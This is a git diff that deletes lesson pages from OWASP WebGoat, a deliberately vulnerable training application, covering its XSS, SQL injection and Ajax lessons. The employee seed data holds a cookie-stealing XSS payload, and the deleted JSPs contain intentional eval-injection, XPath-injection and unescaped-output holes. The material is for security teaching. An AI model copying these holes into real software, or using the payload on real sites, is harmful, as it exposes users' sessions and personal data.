111 - 112 - - - - 108 - Bruce - McGuirre - 8899 FreeBSD Drive<script>alert(document.cookie)</script> - New York, NY - 610-282-1103 - 3012000 - 707-95-9482 - 110000 - 6981754825854136 - 30000 - Enjoys watching others struggle in exercises. - Tortuous Boot Camp workout at 5am. Employees felt sick. 
- 61502 - - 107 - 102 - 111 - 112 - - - - 109 - Sean - Livingston - 6422 dFlyBSD Road - New York, NY - 610-878-9549 - 6012003 - 136-55-1046 - 130000 - 6981754825014510 - 5000 - Has some fascination with Steelers. Go Ravens. - Late to work 30 days in row due to excessive Halo 2 - 72804 - - 107 - 102 - 111 - 112 - - - - 110 - Joanne - McDougal - 5567 Broadband Lane - New York, NY - 610-213-6341 - 1012001 - 789-54-2413 - 90000 - 6981754825081054 - 300 - Finds it necessary to leave early every day. - Used company cc to purchase new car. Limit adjusted. - 112005 - - 106 - 102 - 111 - 112 - - - - 111 - John - Wayne - 129 Third St - New York, NY - 610-213-1134 - 1012001 - 129-69-4572 - 200000 - 4437334565679921 - 300 - - - 112005 - - 112 - - - - 112 - Neville - Bartholomew - 1 Corporate Headquarters - San Jose, CA - 408-587-0024 - 3012000 - 111-111-1111 - 450000 - 4803389267684109 - 300 - - - 112005 - - 112 - - - diff --git a/src/main/webapp/lessons/Ajax/eval.jsp b/src/main/webapp/lessons/Ajax/eval.jsp deleted file mode 100644 index f288f7637..000000000 --- a/src/main/webapp/lessons/Ajax/eval.jsp +++ /dev/null 
@@ -1,38 +0,0 @@ -<%@ page language="java" contentType="text/html; charset=ISO-8859-1" import="java.util.regex.*" import="org.owasp.webgoat.lessons.DangerousEval" - pageEncoding="ISO-8859-1"%> -<% -String action = request.getParameter("action"); -String field1 = request.getParameter("field1"); -String field2 = request.getParameter("field2"); -String regex1 = "^[0-9]{3}$";// any three digits -Pattern pattern1 = Pattern.compile(regex1); - -if(action == null) action = "Purchase"; -if(field1 == null) field1 = "123"; -if(field2 == null) field2 = "-1"; - -/** For security reasons, we remove all '<' and '>' characters to prevent XSS **/ -// Thank you Victor Bucutea for noticing replaceAll only cleans taint to the return value. -field1 = field1.replaceAll("<", ""); -field1 = field1.replaceAll(">", ""); -field2 = field2.replaceAll("<", ""); -field2 = field2.replaceAll(">", ""); - -if("Purchase".equals(action)) -{ - if(!pattern1.matcher(field1).matches()) - { - /** If they supplied the right attack, pass them **/ - if(field1.indexOf("');") != -1 && field1.indexOf("alert") != -1 && field1.indexOf("document.cookie") != -1) - { - session.setAttribute(DangerousEval.PASSED, "true"); - } - - out.write("alert('Whoops: You entered an incorrect access code of \"" + field1 + "\"');"); - } - else - { - out.write("alert('Purchase completed successfully with credit card \"" + field2 + "\" and access code \"" + field1 + "\"');"); - } -} -%> diff --git a/src/main/webapp/lessons/Ajax/images/lesson1_header.jpg b/src/main/webapp/lessons/Ajax/images/lesson1_header.jpg deleted file mode 100644 index 60a809af0..000000000 Binary files a/src/main/webapp/lessons/Ajax/images/lesson1_header.jpg and /dev/null differ diff --git a/src/main/webapp/lessons/Ajax/images/lesson1_workspace.jpg b/src/main/webapp/lessons/Ajax/images/lesson1_workspace.jpg deleted file mode 100644 index 292d25654..000000000 Binary files a/src/main/webapp/lessons/Ajax/images/lesson1_workspace.jpg and /dev/null differ 
diff --git a/src/main/webapp/lessons/Ajax/instructor/clientSideFiltering_i.jsp b/src/main/webapp/lessons/Ajax/instructor/clientSideFiltering_i.jsp
deleted file mode 100644
index e6217ecb6..000000000
--- a/src/main/webapp/lessons/Ajax/instructor/clientSideFiltering_i.jsp
+++ /dev/null
@@ -1,111 +0,0 @@ - -<%@ page language="java" contentType="text/html; charset=ISO-8859-1" - pageEncoding="ISO-8859-1"%> - -<%@ page import="java.io.*, javax.xml.xpath.*, org.xml.sax.InputSource,org.w3c.dom.*,org.apache.ecs.html.* " %> - -<% - -String userId = request.getParameter("userId"); - - - NodeList nodes = null; - - - - File d = new File(this.getServletContext().getRealPath("lessons/Ajax/employees.xml")); - - if(d.exists()){ - System.out.print("File does exist"); - } - else{ - System.out.print("File DOES NOT exist"); - } - - System.out.println(d.getAbsolutePath()); - XPathFactory factory = XPathFactory.newInstance(); - XPath xPath = factory.newXPath(); - InputSource inputSource = new InputSource(new FileInputStream(d)); - - - StringBuffer sb = new StringBuffer(); - - sb.append("/Employees/Employee [Managers/Manager/text()='" + userId + "']/UserID | "); - sb.append("/Employees/Employee [Managers/Manager/text()='" + userId + "']/FirstName | "); - sb.append("/Employees/Employee [Managers/Manager/text()='" + userId + "']/LastName | "); - sb.append("/Employees/Employee [Managers/Manager/text()='" + userId + "']/SSN | "); - sb.append("/Employees/Employee [Managers/Manager/text()='" + userId + "']/Salary "); - - String expression = sb.toString(); - - System.out.print("expression:" + expression); - - - - - - nodes = (NodeList) xPath.evaluate(expression, inputSource, - XPathConstants.NODESET); - int nodesLength = nodes.getLength(); - - - System.out.println("nodesLength:" + nodesLength); - - TR tr; - - int COLUMNS = 5; - - Table t2 = null; - if (nodesLength > 0) - { - t2 = new Table().setCellSpacing(0).setCellPadding(0).setBorder( - 1).setWidth("90%").setAlign("center"); - tr = new TR(); - tr.addElement(new TD().addElement("UserID")); - tr.addElement(new TD().addElement("First Name")); - tr.addElement(new TD().addElement("Last Name")); - tr.addElement(new TD().addElement("SSN")); - tr.addElement(new TD().addElement("Salary")); - t2.addElement(tr); - } - - - - tr = new 
TR(); - - for (int i = 0; i < nodesLength; i++) - { - Node node = nodes.item(i); - - if(i%COLUMNS==0){ - tr = new TR(); - tr.setID(node.getTextContent()); - //tr.setStyle("display: none"); - } - - tr.addElement(new TD().addElement(node.getTextContent())); - - if(i%COLUMNS==(COLUMNS-1)){ - t2.addElement(tr); - } - } - - if(t2 != null){ - out.println(t2.toString()); - } - else{ - out.println("No Results"); - } - - - - - - - - - - - -%> - diff --git a/src/main/webapp/lessons/Ajax/sameOrigin.jsp b/src/main/webapp/lessons/Ajax/sameOrigin.jsp deleted file mode 100644 index 26e652898..000000000 --- a/src/main/webapp/lessons/Ajax/sameOrigin.jsp +++ /dev/null @@ -1 +0,0 @@ -Good Response \ No newline at end of file diff --git a/src/main/webapp/lessons/ConfManagement/config.jsp b/src/main/webapp/lessons/ConfManagement/config.jsp deleted file mode 100644 index 7abe1430f..000000000 --- a/src/main/webapp/lessons/ConfManagement/config.jsp +++ /dev/null @@ -1,19 +0,0 @@ -<%@ page language="java" contentType="text/html; charset=ISO-8859-1" - pageEncoding="ISO-8859-1"%> -<%@page import="org.owasp.webgoat.session.WebSession"%> -<% -WebSession webSession = ((WebSession)session.getAttribute("websession")); -%> - - - - -Configuration Page - - -<% response.sendRedirect(webSession.getCurrentLesson().getLink() + - "&succeeded=yes"); -%> - - - \ No newline at end of file diff --git a/src/main/webapp/lessons/CrossSiteScripting/CrossSiteScripting.css b/src/main/webapp/lessons/CrossSiteScripting/CrossSiteScripting.css deleted file mode 100644 index fad6880ad..000000000 --- a/src/main/webapp/lessons/CrossSiteScripting/CrossSiteScripting.css +++ /dev/null 
@@ -1,14 +0,0 @@
-#lesson_wrapper {height: 435px;width: 500px;}
-#lesson_header {background-image: url(lessons/CrossSiteScripting/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}
-.lesson_workspace {background-image: url(lessons/CrossSiteScripting/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}
-.lesson_text {height: 240px;width: 460px;padding-top: 5px;}
-#lesson_buttons_bottom {height: 20px;width: 460px;}
-#lesson_b_b_left {width: 300px;float: left;}
-#lesson_b_b_right input {width: 100px;float: right;}
-.lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}
-.lesson_workspace { }
-.lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}
-.lesson_text_db {color: #0066FF}
-#lesson_login {background-image: url(lessons/CrossSiteScripting/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
-#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}
-#lesson_search {background-image: url(lessons/CrossSiteScripting/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
diff --git a/src/main/webapp/lessons/CrossSiteScripting/CrossSiteScripting.jsp b/src/main/webapp/lessons/CrossSiteScripting/CrossSiteScripting.jsp
deleted file mode 100644
index a571c370c..000000000
--- a/src/main/webapp/lessons/CrossSiteScripting/CrossSiteScripting.jsp
+++ /dev/null
@@ -1,26 +0,0 @@ -<%@ page contentType="text/html; charset=ISO-8859-1" language="java" - import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting" - errorPage="" %> - -<% -WebSession webSession = ((WebSession)session.getAttribute("websession")); -CrossSiteScripting currentLesson = (CrossSiteScripting) webSession.getCurrentLesson(); -%> -
-
-
- <% - String subViewPage = currentLesson.getPage(webSession); - if (subViewPage != null) - { - //System.out.println("Including sub view page: " + subViewPage); - %> - - <% - } - %> - -
-
\ No newline at end of file diff --git a/src/main/webapp/lessons/CrossSiteScripting/EditProfile.jsp b/src/main/webapp/lessons/CrossSiteScripting/EditProfile.jsp deleted file mode 100644 index 13952f612..000000000 --- a/src/main/webapp/lessons/CrossSiteScripting/EditProfile.jsp +++ /dev/null @@ -1,134 +0,0 @@ -<%@ page contentType="text/html; charset=ISO-8859-1" language="java" - import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting" - errorPage="" %> -<% - WebSession webSession = ((WebSession)session.getAttribute("websession")); - Employee employee = (Employee) session.getAttribute("CrossSiteScripting.Employee"); -%> -
Welcome Back <%=webSession.getUserNameInLesson()%>
-
-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- First Name: - - - - Last Name: - - -
- Street: - - - - City/State: - - -
- Phone: - - - - Start Date: - - -
- SSN: - - - - Salary: - - -
- Credit Card: - - - - Credit Card Limit: - - -
- Comments: - - - - Manager: - - -
- Disciplinary Explanation: - - - - Disciplinary Action Dates: - - -
-
-
- - - - - - - - -
- - - - - - - -
-
-
-
\ No newline at end of file diff --git a/src/main/webapp/lessons/CrossSiteScripting/ListStaff.jsp b/src/main/webapp/lessons/CrossSiteScripting/ListStaff.jsp deleted file mode 100644 index 4f7acd643..000000000 --- a/src/main/webapp/lessons/CrossSiteScripting/ListStaff.jsp +++ /dev/null @@ -1,56 +0,0 @@ -<%@ page contentType="text/html; charset=ISO-8859-1" language="java" - import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting" - errorPage="" %> -<% - WebSession webSession = ((WebSession)session.getAttribute("websession")); - int myUserId = webSession.getUserIdInLesson(); -%> -
Welcome Back <%=webSession.getUserNameInLesson()%> - Staff Listing Page
-
-
-
-

Select from the list below

-
- - - - - -
-
-
- <% - if (webSession.isAuthorizedInLesson(myUserId, CrossSiteScripting.CREATEPROFILE_ACTION)) - { - %> -
- <% - } - %> - <% - if (webSession.isAuthorizedInLesson(myUserId, CrossSiteScripting.DELETEPROFILE_ACTION)) - { - %> -
- <% - } - %> -
- -
- -
- diff --git a/src/main/webapp/lessons/CrossSiteScripting/Login.jsp b/src/main/webapp/lessons/CrossSiteScripting/Login.jsp deleted file mode 100644 index 4479289e9..000000000 --- a/src/main/webapp/lessons/CrossSiteScripting/Login.jsp +++ /dev/null @@ -1,32 +0,0 @@ -<%@ page contentType="text/html; charset=ISO-8859-1" language="java" - import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting" - errorPage="" %> -
-
- <% - WebSession webSession = ((WebSession)session.getAttribute("websession")); - %> -
- -
- -
- -
-
-
\ No newline at end of file diff --git a/src/main/webapp/lessons/CrossSiteScripting/SearchStaff.jsp b/src/main/webapp/lessons/CrossSiteScripting/SearchStaff.jsp deleted file mode 100644 index 4e1f6885c..000000000 --- a/src/main/webapp/lessons/CrossSiteScripting/SearchStaff.jsp +++ /dev/null @@ -1,22 +0,0 @@ -<%@ page contentType="text/html; charset=ISO-8859-1" language="java" - import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting" - errorPage="" %> - \ No newline at end of file diff --git a/src/main/webapp/lessons/CrossSiteScripting/ViewProfile.jsp b/src/main/webapp/lessons/CrossSiteScripting/ViewProfile.jsp deleted file mode 100644 index 46822d95e..000000000 --- a/src/main/webapp/lessons/CrossSiteScripting/ViewProfile.jsp +++ /dev/null @@ -1,160 +0,0 @@ - -<%@ page contentType="text/html; charset=ISO-8859-1" language="java" - import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting" errorPage="" %> -<% -WebSession webSession = ((WebSession)session.getAttribute("websession")); - Employee employee = (Employee) session.getAttribute("CrossSiteScripting." + CrossSiteScripting.EMPLOYEE_ATTRIBUTE_KEY); - CrossSiteScripting lesson = (CrossSiteScripting) webSession.getCurrentLesson(); -// int myUserId = getIntSessionAttribute(webSession, "CrossSiteScripting." + CrossSiteScripting.USER_ID); -%> -
Welcome Back <%=webSession.getUserNameInLesson()%>
-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- First Name: - - <%=employee.getFirstName()%> - - Last Name: - - <%=employee.getLastName()%> -
- Street: - - - - <%=employee.getAddress1()%> - - City/State: - - <%=employee.getAddress2()%> -
- Phone: - - <%=employee.getPhoneNumber()%> - - Start Date: - - <%=employee.getStartDate()%> -
- SSN: - - <%=employee.getSsn()%> - - Salary: - - <%=employee.getSalary()%> -
- Credit Card: - - <%=employee.getCcn()%> - - Credit Card Limit: - - <%=employee.getCcnLimit()%> -
- Comments: - - - - <%=lesson.htmlEncode(webSession, employee.getPersonalDescription())%> - - Manager: - - <%=employee.getManager()%> -
- Disciplinary Explanation: - - <%=employee.getDisciplinaryActionNotes()%> - - Disciplinary Action Dates: - - <%=employee.getDisciplinaryActionDate()%> -
-
-
- - - - <% - } - %> - - - - - -
- <% - if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), CrossSiteScripting.LISTSTAFF_ACTION)) - { - %> -
- - -
- <% - if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), CrossSiteScripting.EDITPROFILE_ACTION)) - { - %> -
- - -
- <% - } - %> -
- <% - if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), CrossSiteScripting.DELETEPROFILE_ACTION)) - { - %> -
- - -
- <% - } - %> -
  -
- -
-
-
diff --git a/src/main/webapp/lessons/CrossSiteScripting/error.jsp b/src/main/webapp/lessons/CrossSiteScripting/error.jsp deleted file mode 100644 index 5af0a45dc..000000000 --- a/src/main/webapp/lessons/CrossSiteScripting/error.jsp +++ /dev/null @@ -1,3 +0,0 @@ -<%@ page contentType="text/html; charset=ISO-8859-1" language="java" - errorPage="" %> -


An error has occurred. diff --git a/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_SearchWindow.jpg b/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_SearchWindow.jpg deleted file mode 100644 index 39e1ed80d..000000000 Binary files a/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_SearchWindow.jpg and /dev/null differ diff --git a/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_header.jpg b/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_header.jpg deleted file mode 100644 index 60a809af0..000000000 Binary files a/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_header.jpg and /dev/null differ diff --git a/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_loginWindow.jpg b/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_loginWindow.jpg deleted file mode 100644 index c91f8a052..000000000 Binary files a/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_loginWindow.jpg and /dev/null differ diff --git a/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_menu.jpg b/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_menu.jpg deleted file mode 100644 index 2c9512571..000000000 Binary files a/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_menu.jpg and /dev/null differ diff --git a/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_workspace.jpg b/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_workspace.jpg deleted file mode 100644 index 292d25654..000000000 Binary files a/src/main/webapp/lessons/CrossSiteScripting/images/lesson1_workspace.jpg and /dev/null differ diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/DBCrossSiteScripting.css b/src/main/webapp/lessons/DBCrossSiteScripting/DBCrossSiteScripting.css deleted file mode 100644 index 8ffcd6a7e..000000000 --- a/src/main/webapp/lessons/DBCrossSiteScripting/DBCrossSiteScripting.css +++ /dev/null 
@@ -1,14 +0,0 @@
-#lesson_wrapper {height: 435px;width: 500px;}
-#lesson_header {background-image: url(lessons/CrossSiteScripting/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}
-.lesson_workspace {background-image: url(lessons/CrossSiteScripting/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}
-.lesson_text {height: 240px;width: 460px;padding-top: 5px;}
-#lesson_buttons_bottom {height: 20px;width: 460px;}
-#lesson_b_b_left {width: 300px;float: left;}
-#lesson_b_b_right input {width: 100px;float: right;}
-.lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}
-.lesson_workspace { }
-.lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}
-.lesson_text_db {color: #0066FF}
-#lesson_login {background-image: url(lessons/CrossSiteScripting/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
-#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}
-#lesson_search {background-image: url(lessons/DBCrossSiteScripting/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/DBCrossSiteScripting.jsp b/src/main/webapp/lessons/DBCrossSiteScripting/DBCrossSiteScripting.jsp
deleted file mode 100644
index 7d6ec61e0..000000000
--- a/src/main/webapp/lessons/DBCrossSiteScripting/DBCrossSiteScripting.jsp
+++ /dev/null
@@ -1,26 +0,0 @@ -<%@ page contentType="text/html; charset=ISO-8859-1" language="java" - import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBCrossSiteScripting.DBCrossSiteScripting" - errorPage="" %> - -<% -WebSession webSession = ((WebSession)session.getAttribute("websession")); -DBCrossSiteScripting currentLesson = (DBCrossSiteScripting) webSession.getCurrentLesson(); -%> -
-
-
- <% - String subViewPage = currentLesson.getPage(webSession); - if (subViewPage != null) - { - //System.out.println("Including sub view page: " + subViewPage); - %> - - <% - } - %> - -
-
\ No newline at end of file diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/EditProfile.jsp b/src/main/webapp/lessons/DBCrossSiteScripting/EditProfile.jsp deleted file mode 100644 index 42f5f08e1..000000000 --- a/src/main/webapp/lessons/DBCrossSiteScripting/EditProfile.jsp +++ /dev/null @@ -1,134 +0,0 @@ -<%@ page contentType="text/html; charset=ISO-8859-1" language="java" - import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBCrossSiteScripting.DBCrossSiteScripting" - errorPage="" %> -<% - WebSession webSession = ((WebSession)session.getAttribute("websession")); - Employee employee = (Employee) session.getAttribute("DBCrossSiteScripting.Employee"); -%> -
Welcome Back <%=webSession.getUserNameInLesson()%>
-
-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- First Name: - - - - Last Name: - - -
- Street: - - - - City/State: - - -
- Phone: - - - - Start Date: - - -
- SSN: - - - - Salary: - - -
- Credit Card: - - - - Credit Card Limit: - - -
- Comments: - - - - Manager: - - -
- Disciplinary Explanation: - - - - Disciplinary Action Dates: - - -
-
-
- - - - - - - - -
- - - - - - - -
-
-
-
\ No newline at end of file diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/ListStaff.jsp b/src/main/webapp/lessons/DBCrossSiteScripting/ListStaff.jsp deleted file mode 100644 index a7c831377..000000000 --- a/src/main/webapp/lessons/DBCrossSiteScripting/ListStaff.jsp +++ /dev/null @@ -1,56 +0,0 @@ -<%@ page contentType="text/html; charset=ISO-8859-1" language="java" - import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBCrossSiteScripting.DBCrossSiteScripting" - errorPage="" %> -<% - WebSession webSession = ((WebSession)session.getAttribute("websession")); - int myUserId = webSession.getUserIdInLesson(); -%> -
Welcome Back <%=webSession.getUserNameInLesson()%> - Staff Listing Page
-
-
-
-

Select from the list below

-
- - - - - -
-
-
- <% - if (webSession.isAuthorizedInLesson(myUserId, DBCrossSiteScripting.CREATEPROFILE_ACTION)) - { - %> -
- <% - } - %> - <% - if (webSession.isAuthorizedInLesson(myUserId, DBCrossSiteScripting.DELETEPROFILE_ACTION)) - { - %> -
- <% - } - %> -
- -
- -
- diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/Login.jsp b/src/main/webapp/lessons/DBCrossSiteScripting/Login.jsp deleted file mode 100644 index 9daefd1b6..000000000 --- a/src/main/webapp/lessons/DBCrossSiteScripting/Login.jsp +++ /dev/null @@ -1,32 +0,0 @@ -<%@ page contentType="text/html; charset=ISO-8859-1" language="java" - import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBCrossSiteScripting.DBCrossSiteScripting" - errorPage="" %> -
-
- <% - WebSession webSession = ((WebSession)session.getAttribute("websession")); - %> -
- -
- -
- -
-
-
\ No newline at end of file diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/SearchStaff.jsp b/src/main/webapp/lessons/DBCrossSiteScripting/SearchStaff.jsp deleted file mode 100644 index ddc5519b5..000000000 --- a/src/main/webapp/lessons/DBCrossSiteScripting/SearchStaff.jsp +++ /dev/null @@ -1,22 +0,0 @@ -<%@ page contentType="text/html; charset=ISO-8859-1" language="java" - import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBCrossSiteScripting.DBCrossSiteScripting" - errorPage="" %> - \ No newline at end of file diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/ViewProfile.jsp b/src/main/webapp/lessons/DBCrossSiteScripting/ViewProfile.jsp deleted file mode 100644 index ce0fee2b2..000000000 --- a/src/main/webapp/lessons/DBCrossSiteScripting/ViewProfile.jsp +++ /dev/null @@ -1,151 +0,0 @@ -<%@ page contentType="text/html; charset=ISO-8859-1" language="java" - import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBCrossSiteScripting.DBCrossSiteScripting" errorPage="" %> -<% -WebSession webSession = ((WebSession)session.getAttribute("websession")); - Employee employee = (Employee) session.getAttribute("DBCrossSiteScripting." + DBCrossSiteScripting.EMPLOYEE_ATTRIBUTE_KEY); -%> -
Welcome Back <%=webSession.getUserNameInLesson()%>
-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- First Name: - - <%=employee.getFirstName()%> - - Last Name: - - <%=employee.getLastName()%> -
- Street: - - <%=employee.getAddress1()%> - - City/State: - - <%=employee.getAddress2()%> -
- Phone: - - <%=employee.getPhoneNumber()%> - - Start Date: - - <%=employee.getStartDate()%> -
- SSN: - - <%=employee.getSsn()%> - - Salary: - - <%=employee.getSalary()%> -
- Credit Card: - - <%=employee.getCcn()%> - - Credit Card Limit: - - <%=employee.getCcnLimit()%> -
- Comments: - - <%=employee.getPersonalDescription()%> - - Manager: - - <%=employee.getManager()%> -
- Disciplinary Explanation: - - <%=employee.getDisciplinaryActionNotes()%> - - Disciplinary Action Dates: - - <%=employee.getDisciplinaryActionDate()%> -
-
-
- - - - <% - } - %> - - - - - -
- <% - if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), DBCrossSiteScripting.LISTSTAFF_ACTION)) - { - %> -
- - -
- <% - if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), DBCrossSiteScripting.EDITPROFILE_ACTION)) - { - %> -
- - -
- <% - } - %> -
- <% - if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), DBCrossSiteScripting.DELETEPROFILE_ACTION)) - { - %> -
- - -
- <% - } - %> -
  -
- -
-
-
diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/error.jsp b/src/main/webapp/lessons/DBCrossSiteScripting/error.jsp deleted file mode 100644 index 5af0a45dc..000000000 --- a/src/main/webapp/lessons/DBCrossSiteScripting/error.jsp +++ /dev/null @@ -1,3 +0,0 @@ -<%@ page contentType="text/html; charset=ISO-8859-1" language="java" - errorPage="" %> -


An error has occurred. diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_SearchWindow.jpg b/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_SearchWindow.jpg deleted file mode 100644 index 39e1ed80d..000000000 Binary files a/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_SearchWindow.jpg and /dev/null differ diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_header.jpg b/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_header.jpg deleted file mode 100644 index 60a809af0..000000000 Binary files a/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_header.jpg and /dev/null differ diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_loginWindow.jpg b/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_loginWindow.jpg deleted file mode 100644 index c91f8a052..000000000 Binary files a/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_loginWindow.jpg and /dev/null differ diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_menu.jpg b/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_menu.jpg deleted file mode 100644 index 2c9512571..000000000 Binary files a/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_menu.jpg and /dev/null differ diff --git a/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_workspace.jpg b/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_workspace.jpg deleted file mode 100644 index 292d25654..000000000 Binary files a/src/main/webapp/lessons/DBCrossSiteScripting/images/lesson1_workspace.jpg and /dev/null differ diff --git a/src/main/webapp/lessons/DBSQLInjection/DBSQLInjection.css b/src/main/webapp/lessons/DBSQLInjection/DBSQLInjection.css deleted file mode 100644 index b0b84331b..000000000 --- a/src/main/webapp/lessons/DBSQLInjection/DBSQLInjection.css +++ /dev/null 
@@ -1,14 +0,0 @@
-#lesson_wrapper {height: 435px;width: 500px;}
-#lesson_header {background-image: url(lessons/DBSQLInjection/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}
-.lesson_workspace {background-image: url(lessons/DBSQLInjection/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}
-.lesson_text {height: 240px;width: 460px;padding-top: 5px;}
-#lesson_buttons_bottom {height: 20px;width: 460px;}
-#lesson_b_b_left {width: 300px;float: left;}
-#lesson_b_b_right input {width: 100px;float: right;}
-.lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}
-.lesson_workspace { }
-.lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}
-.lesson_text_db {color: #0066FF}
-#lesson_login {background-image: url(lessons/DBSQLInjection/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
-#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}
-#lesson_search {background-image: url(lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
diff --git a/src/main/webapp/lessons/DBSQLInjection/DBSQLInjection.jsp b/src/main/webapp/lessons/DBSQLInjection/DBSQLInjection.jsp
deleted file mode 100644
index 7bf2fc250..000000000
--- a/src/main/webapp/lessons/DBSQLInjection/DBSQLInjection.jsp
+++ /dev/null
@@ -1,26 +0,0 @@ -<%@ page contentType="text/html; charset=ISO-8859-1" language="java" - import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBSQLInjection.DBSQLInjection" - errorPage="" %> - -<% -WebSession webSession = ((WebSession)session.getAttribute("websession")); -DBSQLInjection currentLesson = (DBSQLInjection) webSession.getCurrentLesson(); -%> -
-
-
- <% - String subViewPage = currentLesson.getPage(webSession); - if (subViewPage != null) - { - //System.out.println("Including sub view page: " + subViewPage); - %> - - <% - } - %> - -
-
\ No newline at end of file diff --git a/src/main/webapp/lessons/DBSQLInjection/EditProfile.jsp b/src/main/webapp/lessons/DBSQLInjection/EditProfile.jsp deleted file mode 100644 index 92abe249f..000000000 --- a/src/main/webapp/lessons/DBSQLInjection/EditProfile.jsp +++ /dev/null @@ -1,133 +0,0 @@ -<%@ page contentType="text/html; charset=ISO-8859-1" language="java" - import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBSQLInjection.DBSQLInjection" - errorPage="" %> -<% - WebSession webSession = ((WebSession)session.getAttribute("websession")); - Employee employee = (Employee) session.getAttribute("DBSQLInjection.Employee"); -%> -
Welcome Back <%=webSession.getUserNameInLesson()%>
-
-
